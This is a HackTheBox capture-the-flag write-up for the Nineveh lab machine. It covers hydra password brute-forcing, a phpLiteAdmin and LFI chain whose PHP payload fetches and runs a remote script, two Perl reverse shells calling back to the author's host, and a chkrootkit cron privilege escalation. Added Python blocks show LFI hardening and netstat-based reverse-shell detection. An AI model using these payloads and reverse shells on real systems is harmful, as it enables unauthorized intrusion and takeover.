The Nineveh machine on HackTheBox has retired. It was a Linux VM that can be considered an intermediate-level box; getting the flags (both user and system) was rated "Hard".

Note: In order to keep all my CTF write-ups crisp and concise, I only mention the steps which led to positive results. There was a lot of trial and error, and hours or in some cases even days of failed attempts, before reaching the correct solution. For this challenge, the IP address of my machine was 10.10.14.34 and Nineveh was 10.10.10.43.

Reconnaissance

I started with nmap to check for all open ports (-p-), the versions of the services running (-sV) and run the default set of scripts (-sC).

nmap -sC -sV -p- 10.10.10.43

80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time

Since both port 80 and port 443 were open, I ran dirb to enumerate directories, using dirb http://10.10.10.43/ for port 80 and dirb https://10.10.10.43/ for SSL.

The output of dirb revealed two hidden pages, https://10.10.10.43/db and http://10.10.10.43/department/login.php. On navigating to the directory /db, there was the phpLiteAdmin login page.



Also, I checked the SSL certificate and found some useful information. The username "admin" was later found to be useful.

Exploitation

phpLiteAdmin 1.9.3 has a remote code execution vulnerability whose details can be found here. In order to exploit this vulnerability, access to the admin console was required. Since I didn't have the password, I used hydra to brute force it.

hydra -v 10.10.10.43 https-form-post "/db/index.php:password=^PASS^&login=Log+In&proc_login=true:F=Incorrect password" -l '' -P /usr/share/wordlists/rockyou.txt -t 10 -w 30

After a few minutes, the brute force attempt was successful and I got the admin password.



Uploading Reverse Shell

On logging in, there was the admin console, which allowed creating databases and tables. I created a new database with the name "ninevehNotes.php". There was a reason to create the database with this particular name, which I will explain later.



I selected the newly created database and created a new table with 1 field. For the exploit to work, the table name didn't matter, so it can be anything. Make note of the "Path to database" in the image below. It is the location where our database will be stored. It is important because it will be used later to execute the arbitrary command. The database is stored in the directory /var/tmp.

Now came the interesting part. To upload the shell, the field type should be set to "text" and the default value to the command which needs to be executed. Here the field name can be anything. I used the default value <?php system("wget -O /tmp/shell.pl http://10.10.14.34:8000/shell.pl;perl /tmp/shell.pl"); ?> which will fetch the reverse shell from my system (10.10.14.34) into the victim's /tmp directory and execute it.

On my machine, I created a Perl reverse shell, shell.pl:

use Socket;
$i="10.10.14.34";
$p=80;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

I opened a netcat listener on port 80 using nc -nlvp 80 to get the shell back from the victim.

Getting the reverse shell

The next goal was to somehow access the database ninevehNotes.php to perform arbitrary command execution. Since the database was saved in the /var/tmp directory, it was not possible to access it from the current webpage. Then I switched to the other login page found by dirb, http://10.10.10.43/department/login.php. Again I used hydra, this time with the username admin (found earlier from the SSL certificate).

hydra -v 10.10.10.43 http-form-post "/department/login.php:username=^USER^&password=^PASS^:F=Invalid Password!" -l 'admin' -P /usr/share/wordlists/rockyou.txt -t 10 -w 30

This time also, hydra successfully guessed the correct password.



I logged in to the application. There was a notes tab which directed to the URL http://10.10.10.43/department/manage.php?notes=ninevehNotes.txt and printed the content of the file ninevehNotes.txt. I tested the notes parameter for a Local File Inclusion (LFI) vulnerability and, after much trial and error and careful analysis of the error messages, I found that it was indeed vulnerable to LFI. The catch was that the file being accessed must contain the word "ninevehNotes" in its name. This was the reason I earlier named the database file ninevehNotes.php. The LFI was the good news, because now I could access the database and execute the arbitrary command. I used the URL http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php and got successful code execution !!! My reverse shell was downloaded to the victim, executed there, and returned the shell 🙂
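The substring filter described above is what made the LFI exploitable: it checks the name, not the location. As an added example (not code from the box or the write-up), here is that weak check modelled next to a hardened resolver that only accepts a bare .txt filename and confirms the resolved path stays inside the notes directory. NOTES_DIR and the .txt rule are assumptions for the example.

```python
import os
from typing import Optional

# Directory the notes feature is meant to read from and the only extension
# a note may carry. Both are assumptions for this example, not paths taken
# from the Nineveh box.
NOTES_DIR = "/var/www/html/department/notes"
NOTE_SUFFIX = ".txt"


def weak_check(notes: str) -> bool:
    """Models the filter the write-up describes: anything containing the
    literal 'ninevehNotes' passes, so /var/tmp/ninevehNotes.php is accepted."""
    return "ninevehNotes" in notes


def safe_note_path(notes: str, notes_dir: str = NOTES_DIR) -> Optional[str]:
    """Resolve a user-supplied note name to a file under notes_dir.

    Returns the absolute path to include, or None when the request is
    rejected. Rejected: empty names, NUL bytes, anything that is not a bare
    filename (no '/' or '..' segments), a suffix other than .txt, and any
    resolved path that leaves notes_dir after symlink/.. normalisation."""
    if not notes or "\x00" in notes:
        return None
    if os.path.basename(notes) != notes or notes in (".", ".."):
        return None
    if not notes.endswith(NOTE_SUFFIX):
        return None
    base = os.path.realpath(notes_dir)
    target = os.path.realpath(os.path.join(base, notes))
    # realpath follows symlinks, so a note that links outside is caught here
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def audit(requests):
    """Run both checks over a list of notes= values; returns
    {value: (weak_check result, safe_note_path result)}."""
    return {r: (weak_check(r), safe_note_path(r)) for r in requests}


if __name__ == "__main__":
    sample = ["ninevehNotes.txt", "/var/tmp/ninevehNotes.php",
              "../../../etc/passwd", "notes/../ninevehNotes.txt"]
    for value, (weak, safe) in audit(sample).items():
        print(f"{value!r:35} weak={weak!s:5} safe={safe}")
```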

Post Exploitation

The shell I got was for the user www-data. I moved to the web application directory to check for any hidden directories which might have been missed by dirb. Inside the folder /var/www/ssl there was the directory secure_notes. Using the browser, I navigated to the URL https://10.10.10.43/secure_notes. It opened a page with a very slowly loading image. I downloaded the image and saved it on my local system. The image size was around 3MB. I found that a bit suspicious and used strings to look for any information hidden inside it.

strings secure_notes.png > secure_notes.txt

And indeed, there was an SSH RSA key pair for the user amrois hidden inside the image.



I saved the RSA private key in the file id_rsa and transferred it to the victim using wget.

I used netstat to check whether the victim was listening for SSH connections.

netstat -antp

Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -
tcp        0    125 10.10.10.43:44788       10.10.14.34:80          ESTABLISHED 4931/netstat
tcp        0      0 10.10.10.43:35434       10.10.14.59:1337        ESTABLISHED 5322/nc
tcp        1      0 10.10.10.43:80          10.10.14.34:57114       CLOSE_WAIT  -
tcp        0      0 10.10.10.43:80          10.10.14.59:42246       ESTABLISHED -
tcp6       0      0 :::22                   :::*                    LISTEN      -

The host was listening on port 22, but the firewall was restricting SSH connections from external IPs (I checked iptables); only users on the local machine could log in via SSH. Inside the victim shell, I used the private key (id_rsa) to ssh as amrois.
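The netstat output above is also what a defender would see on this box: two ESTABLISHED sockets with ephemeral local ports, i.e. connections the web server itself opened to 10.10.14.34:80 and 10.10.14.59:1337, which are the reverse shells. As an added example (not part of the write-up), this parser reads that output and flags such outbound connections and any listener outside an assumed baseline of ports 22, 80 and 443.

```python
import re

# Sample input: the netstat -antp output shown in the write-up above.
NETSTAT_OUTPUT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -
tcp        0    125 10.10.10.43:44788       10.10.14.34:80          ESTABLISHED 4931/netstat
tcp        0      0 10.10.10.43:35434       10.10.14.59:1337        ESTABLISHED 5322/nc
tcp        1      0 10.10.10.43:80          10.10.14.34:57114       CLOSE_WAIT  -
tcp        0      0 10.10.10.43:80          10.10.14.59:42246       ESTABLISHED -
tcp6       0      0 :::22                   :::*                    LISTEN      -
"""

# Ports this host is supposed to serve (assumed baseline for a web server
# that also runs sshd). Anything else deserves a look.
EXPECTED_LISTEN = {22, 80, 443}

LINE_RE = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_netstat(output):
    """Yield (local, foreign, state, program) for each tcp row; the header
    and any non-matching line are skipped."""
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m:
            _proto, local, foreign, state, prog = m.groups()
            yield local, foreign, state, prog


def local_port(addr):
    # rpartition handles both "0.0.0.0:80" and the IPv6 form ":::22"
    return int(addr.rpartition(":")[2])


def suspicious_sockets(output, expected_listen=EXPECTED_LISTEN):
    """Rows worth investigating: a LISTEN on a port outside the baseline
    (unexpected service or bind shell), or an ESTABLISHED socket whose local
    port is not one we serve, meaning this host initiated the connection.
    Inbound connections to 80/443 are left alone."""
    flagged = []
    for local, foreign, state, prog in parse_netstat(output):
        if state in ("LISTEN", "ESTABLISHED") and local_port(local) not in expected_listen:
            flagged.append((local, foreign, state, prog))
    return flagged


if __name__ == "__main__":
    for row in suspicious_sockets(NETSTAT_OUTPUT):
        print(*row)
```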

ssh -o StrictHostKeyChecking=no -i id_rsa amrois@nineveh.htb

I was successfully able to log in as amrois and read the user flag.

Privilege Escalation

I checked the files and folders in the root directory and found something strange.



There was a folder "report" owned by the user amrois. Inside the folder, reports were being generated constantly, which meant some cron job was probably running. I checked the content of one of the reports, which contained the string "Searching for Suckit rootkit... Warning: /sbin/init INFECTED". Doing a quick Google search I came across this link. The output was generated by the chkrootkit command. I checked for exploits related to chkrootkit and found one which allowed Local Privilege Escalation. The exploit details can be found here. I created the Perl reverse shell script root.pl in the /tmp directory and started a listener on my local machine on port 5555.

#!/usr/bin/perl
use Socket;
$i="10.10.14.34";
$p=5555;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))) {
open(STDIN,">&S"); open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");
};

I made the script executable using chmod +x root.pl and waited for the cron job to run again. After a few seconds I had the root shell 😀



Final note

This machine was of moderate difficulty. It is very important to enumerate all web directories on both port 80 and port 443, if open, for hidden directories (here it led to remote code execution). As a pentester it is important to fuzz inputs and properly analyze error messages (that is what led to creating the database with the name ninevehNotes.php). Analyze images for hidden content (here, SSH keys stored in an image). Do proper enumeration after getting the shell (netstat to check for internally listening ports).

I hope this write-up was helpful. Share it if you found it useful. If you have any questions or suggestions, please leave your comments. Subscribe to the mailing list to get updates on my future CTF write-ups and blogs.

Happy Learning 🙂